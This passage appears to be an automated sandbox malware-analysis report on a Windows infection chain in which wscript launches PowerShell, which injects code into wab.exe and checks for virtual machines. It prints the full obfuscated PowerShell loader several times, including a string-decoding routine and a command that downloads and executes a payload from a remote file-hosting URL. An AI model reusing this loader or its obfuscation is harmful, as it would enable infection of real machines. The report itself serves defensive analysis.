              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6058Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3802Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6963Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2707Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 4482Jump to behavior
              Source: C:\Windows\System32\wscript.exe TID: 3748Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1488Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep count: 6963 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 368Thread sleep count: 2707 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3648Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4616Thread sleep count: 4482 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 892Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 4482 delay: -5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 60000Jump to behavior
              Source: powershell.exe, 00000002.00000002.2713252322.000001A0E2EA5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe)%SystemRoot%\system32\mswsock.dllllodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes
              Source: wscript.exe, 00000001.00000002.2071021377.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2069612519.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041244405.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041007560.000002293C0BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
              Source: wscript.exe, 00000001.00000002.2070838707.000002293C045000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9bxk
              Source: wscript.exe, 00000001.00000002.2070838707.000002293C034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: wscript.exe, 00000001.00000002.2071233664.000002293C12A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.2071021377.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2069612519.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041244405.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041492906.000002293C12A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.2041007560.000002293C0BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2560315614.00000000054A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3336499423.0000000005448000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3336499423.00000000054A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0354D434 LdrInitializeThunk,5_2_0354D434

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A00000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 27BFB08Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$superexcrescence = 1;$necroscopic18='substrin';$necroscopic18+='g';function refrig213($kllert){$ecstasy=$kllert.length-$superexcrescence;for($odeum119=7; $odeum119 -lt $ecstasy; $odeum119+=(8)){$gumminess+=$kllert.$necroscopic18.invoke($odeum119, $superexcrescence);}$gumminess;}function medicinmands($allodiaries){.($deviascope) ($allodiaries);}$styggeres=refrig213 ' gglendmcondensorugekaszforkldnip okonsl fe tivl minimuabasioph/ skopu,5protoc .si,vanu0oilwell oversu (arkitekwpincushimultiman bordindprogramo.endarmwlitesbes trolje bogtilnaa.nerst disput insta.1thegidd0typhloe.luftrum0.onglet;manipul firmaaworderleioutpuncnun.idyu6 procta4anguish; a.tito haandstx s heno6finvask4alle dy;sidevae paramyorphrensivtransfo:melania1dejeune2curatis1,efrica.organ.s0jeanell)townsid grundligd rklore willsecforfaldkkejsereomaledi /syresub2 stjfor0 ueform1tricaud0paakal,0mesmeri1miljmyn0s uporh1bagsder pseudofffalangiidaleswor folkete etakinfpa,tagnoleukocixsmearin/partic 1feudals2skildre1frdiggr. bredba0uforsta ';$unpsychologically253=refrig213 'overeksu investsarticulebaker.trdatasty-.edgrelaspulzieganilinfefemogtynepithemtdet,nat ';$cereals148=refrig213 'jomfruthtippie,tfa,iaditindolsspniveauosseriepr:saetn n/su.erbi/deko.atd slitlirjulerosigypterev secreteassis,e..entralgforkvi osv,desto buntmag defilal verdenemesmeri.nringsvcisoca,powh.tewamhovedpr/ .ovordupar,gracsqueaks?gravigrecobaltix ,trygeptrsteproun ullersomiklet forkar=toldgrndskuerr,ostatsmawpa oxysn metricltranspoobeerhouaherrengdgard.ro&alarmtiidisqu,ldt.skeee=luftlag1re talln drivtmufore.adrfalckcesprobity3 tonic.3 glummepregel,tjin,ulcax evani,edjvelsbznglebenqski.opph reforgl prmier9desolatcskjterniquackstaindru lf aflireo poly.lpqualityy interoadivedam6coolamoukalkeri7skalpe ienhedsp1lin eluvbaggaarptekstbekbegoniav immome ';$modularization=refrig213 'steelwo>meddele ';$deviascope=refrig213 ' inventikara,scesaftp.exdyretmm ';$bundskrabets = refrig213 'ass mese,ilestocusu apihjoini,gom.nksco majo,em% resultaposto,tp smu.hupgreekizdgru dtra slaumptmithraiavelgrer%mirthf,\tendensg presenetrykkernforbrusnurkrfteefrequenm syltekspolyce.ggyri akn ref,rmiprecoolnopret.eg gsindssadskil,.antasteftall,njaacetoacsstartsy stereot&exodus &gu.runn d.laasee .athogcmuriatehbaggingo baptis serozem$ vg.igh ';medicinmands (refrig213 'b ckpac$rrgtracgdalboarlbedrageogrunthubbeecherahaikunml kilede:r agummg rundleshackinwimpardogelektroa superlw scatteyv,lenci=milieuo(unplatic koalitmstamherdstjmaal overcap/ud lokkcpreopp hyperbl$thaumatbleucon.ueditor n owdyisd carroosnoedigtkh,nnahar bo,seja potmenbhfte.sse .onputt oestaus rals.o)ennikes ');medicinmands (refrig213 ' stabel$dominangindvendln,biimrospexenebplusrepawithal,lsejrs,t:irr.denn bis,ekyhandskem sekun acita.ioa mothernimpugnme synga =ecclesi$retromac ma.ufaed,unmedrsindsbeeigniti,aare litlled,teks.atteti1 lyttas4unresus8,eferti.am
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$superexcrescence = 1;$necroscopic18='substrin';$necroscopic18+='g';function refrig213($kllert){$ecstasy=$kllert.length-$superexcrescence;for($odeum119=7; $odeum119 -lt $ecstasy; $odeum119+=(8)){$gumminess+=$kllert.$necroscopic18.invoke($odeum119, $superexcrescence);}$gumminess;}function medicinmands($allodiaries){.($deviascope) ($allodiaries);}$styggeres=refrig213 ' gglendmcondensorugekaszforkldnip okonsl fe tivl minimuabasioph/ skopu,5protoc .si,vanu0oilwell oversu (arkitekwpincushimultiman bordindprogramo.endarmwlitesbes trolje bogtilnaa.nerst disput insta.1thegidd0typhloe.luftrum0.onglet;manipul firmaaworderleioutpuncnun.idyu6 procta4anguish; a.tito haandstx s heno6finvask4alle dy;sidevae paramyorphrensivtransfo:melania1dejeune2curatis1,efrica.organ.s0jeanell)townsid grundligd rklore willsecforfaldkkejsereomaledi /syresub2 stjfor0 ueform1tricaud0paakal,0mesmeri1miljmyn0s uporh1bagsder pseudofffalangiidaleswor folkete etakinfpa,tagnoleukocixsmearin/partic 1feudals2skildre1frdiggr. bredba0uforsta ';$unpsychologically253=refrig213 'overeksu investsarticulebaker.trdatasty-.edgrelaspulzieganilinfefemogtynepithemtdet,nat ';$cereals148=refrig213 'jomfruthtippie,tfa,iaditindolsspniveauosseriepr:saetn n/su.erbi/deko.atd slitlirjulerosigypterev secreteassis,e..entralgforkvi osv,desto buntmag defilal verdenemesmeri.nringsvcisoca,powh.tewamhovedpr/ .ovordupar,gracsqueaks?gravigrecobaltix ,trygeptrsteproun ullersomiklet forkar=toldgrndskuerr,ostatsmawpa oxysn metricltranspoobeerhouaherrengdgard.ro&alarmtiidisqu,ldt.skeee=luftlag1re talln drivtmufore.adrfalckcesprobity3 tonic.3 glummepregel,tjin,ulcax evani,edjvelsbznglebenqski.opph reforgl prmier9desolatcskjterniquackstaindru lf aflireo poly.lpqualityy interoadivedam6coolamoukalkeri7skalpe ienhedsp1lin eluvbaggaarptekstbekbegoniav immome ';$modularization=refrig213 'steelwo>meddele ';$deviascope=refrig213 ' inventikara,scesaftp.exdyretmm ';$bundskrabets = refrig213 'ass mese,ilestocusu apihjoini,gom.nksco majo,em% resultaposto,tp smu.hupgreekizdgru dtra slaumptmithraiavelgrer%mirthf,\tendensg presenetrykkernforbrusnurkrfteefrequenm syltekspolyce.ggyri akn ref,rmiprecoolnopret.eg gsindssadskil,.antasteftall,njaacetoacsstartsy stereot&exodus &gu.runn d.laasee .athogcmuriatehbaggingo baptis serozem$ vg.igh ';medicinmands (refrig213 'b ckpac$rrgtracgdalboarlbedrageogrunthubbeecherahaikunml kilede:r agummg rundleshackinwimpardogelektroa superlw scatteyv,lenci=milieuo(unplatic koalitmstamherdstjmaal overcap/ud lokkcpreopp hyperbl$thaumatbleucon.ueditor n owdyisd carroosnoedigtkh,nnahar bo,seja potmenbhfte.sse .onputt oestaus rals.o)ennikes ');medicinmands (refrig213 ' stabel$dominangindvendln,biimrospexenebplusrepawithal,lsejrs,t:irr.denn bis,ekyhandskem sekun acita.ioa mothernimpugnme synga =ecclesi$retromac ma.ufaed,unmedrsindsbeeigniti,aare litlled,teks.atteti1 lyttas4unresus8,eferti.am
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$superexcrescence = 1;$necroscopic18='substrin';$necroscopic18+='g';function refrig213($kllert){$ecstasy=$kllert.length-$superexcrescence;for($odeum119=7; $odeum119 -lt $ecstasy; $odeum119+=(8)){$gumminess+=$kllert.$necroscopic18.invoke($odeum119, $superexcrescence);}$gumminess;}function medicinmands($allodiaries){.($deviascope) ($allodiaries);}$styggeres=refrig213 ' gglendmcondensorugekaszforkldnip okonsl fe tivl minimuabasioph/ skopu,5protoc .si,vanu0oilwell oversu (arkitekwpincushimultiman bordindprogramo.endarmwlitesbes trolje bogtilnaa.nerst disput insta.1thegidd0typhloe.luftrum0.onglet;manipul firmaaworderleioutpuncnun.idyu6 procta4anguish; a.tito haandstx s heno6finvask4alle dy;sidevae paramyorphrensivtransfo:melania1dejeune2curatis1,efrica.organ.s0jeanell)townsid grundligd rklore willsecforfaldkkejsereomaledi /syresub2 stjfor0 ueform1tricaud0paakal,0mesmeri1miljmyn0s uporh1bagsder pseudofffalangiidaleswor folkete etakinfpa,tagnoleukocixsmearin/partic 1feudals2skildre1frdiggr. bredba0uforsta ';$unpsychologically253=refrig213 'overeksu investsarticulebaker.trdatasty-.edgrelaspulzieganilinfefemogtynepithemtdet,nat ';$cereals148=refrig213 'jomfruthtippie,tfa,iaditindolsspniveauosseriepr:saetn n/su.erbi/deko.atd slitlirjulerosigypterev secreteassis,e..entralgforkvi osv,desto buntmag defilal verdenemesmeri.nringsvcisoca,powh.tewamhovedpr/ .ovordupar,gracsqueaks?gravigrecobaltix ,trygeptrsteproun ullersomiklet forkar=toldgrndskuerr,ostatsmawpa oxysn metricltranspoobeerhouaherrengdgard.ro&alarmtiidisqu,ldt.skeee=luftlag1re talln drivtmufore.adrfalckcesprobity3 tonic.3 glummepregel,tjin,ulcax evani,edjvelsbznglebenqski.opph reforgl prmier9desolatcskjterniquackstaindru lf aflireo poly.lpqualityy interoadivedam6coolamoukalkeri7skalpe ienhedsp1lin eluvbaggaarptekstbekbegoniav immome ';$modularization=refrig213 'steelwo>meddele ';$deviascope=refrig213 ' inventikara,scesaftp.exdyretmm ';$bundskrabets = refrig213 'ass mese,ilestocusu apihjoini,gom.nksco majo,em% resultaposto,tp smu.hupgreekizdgru dtra slaumptmithraiavelgrer%mirthf,\tendensg presenetrykkernforbrusnurkrfteefrequenm syltekspolyce.ggyri akn ref,rmiprecoolnopret.eg gsindssadskil,.antasteftall,njaacetoacsstartsy stereot&exodus &gu.runn d.laasee .athogcmuriatehbaggingo baptis serozem$ vg.igh ';medicinmands (refrig213 'b ckpac$rrgtracgdalboarlbedrageogrunthubbeecherahaikunml kilede:r agummg rundleshackinwimpardogelektroa superlw scatteyv,lenci=milieuo(unplatic koalitmstamherdstjmaal overcap/ud lokkcpreopp hyperbl$thaumatbleucon.ueditor n owdyisd carroosnoedigtkh,nnahar bo,seja potmenbhfte.sse .onputt oestaus rals.o)ennikes ');medicinmands (refrig213 ' stabel$dominangindvendln,biimrospexenebplusrepawithal,lsejrs,t:irr.denn bis,ekyhandskem sekun acita.ioa mothernimpugnme synga =ecclesi$retromac ma.ufaed,unmedrsindsbeeigniti,aare litlled,teks.atteti1 lyttas4unresus8,eferti.amJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$superexcrescence = 1;$necroscopic18='substrin';$necroscopic18+='g';function refrig213($kllert){$ecstasy=$kllert.length-$superexcrescence;for($odeum119=7; $odeum119 -lt $ecstasy; $odeum119+=(8)){$gumminess+=$kllert.$necroscopic18.invoke($odeum119, $superexcrescence);}$gumminess;}function medicinmands($allodiaries){.($deviascope) ($allodiaries);}$styggeres=refrig213 ' gglendmcondensorugekaszforkldnip okonsl fe tivl minimuabasioph/ skopu,5protoc .si,vanu0oilwell oversu (arkitekwpincushimultiman bordindprogramo.endarmwlitesbes trolje bogtilnaa.nerst disput insta.1thegidd0typhloe.luftrum0.onglet;manipul firmaaworderleioutpuncnun.idyu6 procta4anguish; a.tito haandstx s heno6finvask4alle dy;sidevae paramyorphrensivtransfo:melania1dejeune2curatis1,efrica.organ.s0jeanell)townsid grundligd rklore willsecforfaldkkejsereomaledi /syresub2 stjfor0 ueform1tricaud0paakal,0mesmeri1miljmyn0s uporh1bagsder pseudofffalangiidaleswor folkete etakinfpa,tagnoleukocixsmearin/partic 1feudals2skildre1frdiggr. bredba0uforsta 